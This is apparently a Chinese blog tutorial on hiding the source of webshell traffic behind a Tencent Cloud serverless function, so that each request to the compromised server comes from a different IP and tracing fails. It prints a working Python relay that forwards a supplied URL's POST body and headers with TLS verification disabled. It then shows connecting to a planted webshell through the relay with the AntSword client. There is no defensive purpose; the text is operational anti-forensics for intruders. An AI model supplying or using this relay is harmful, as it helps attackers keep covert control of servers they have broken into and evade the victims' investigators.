介绍:

云函数自带CDN,每次请求webshell的时候ip都不同,利用云函数反溯源

正文:

创建云函数

  • 登录腾讯云,创建云函数

image.png

  • 配置创建方式、函数类型、部署方式

image.png

  • 函数代码,选择在线编辑

代码如下:

# -*- coding: utf8 -*-
import requests
import json


def geturl(urlstr):
    jurlstr = json.dumps(urlstr)
    dict_url = json.loads(jurlstr)
    return dict_url['u']

def main_handler(event, context):
    url = geturl(event['queryString'])
    postdata = event['body']
    headers=event['headers']
    resp=requests.post(url,data=postdata,headers=headers,verify=False)
    response={
        "isBase64Encoded": False,
        "statusCode": 200,
        "headers": {'Content-Type': 'text/html;charset='+resp.apparent_encoding},
        "body": resp.text
    }
    return response

代码执行头
image.png
配置触发器,点击完成,就创建成功image.png

获取云函数URL,复制访问路径
image.png

webshell使用云函数连接

  • 云函数+webshell

云函数?u=webshell
image.png
使用蚁剑连接、

image.png

最后修改:2021 年 12 月 05 日 09 : 26 PM
如果觉得我的文章对你有用,请随意赞赏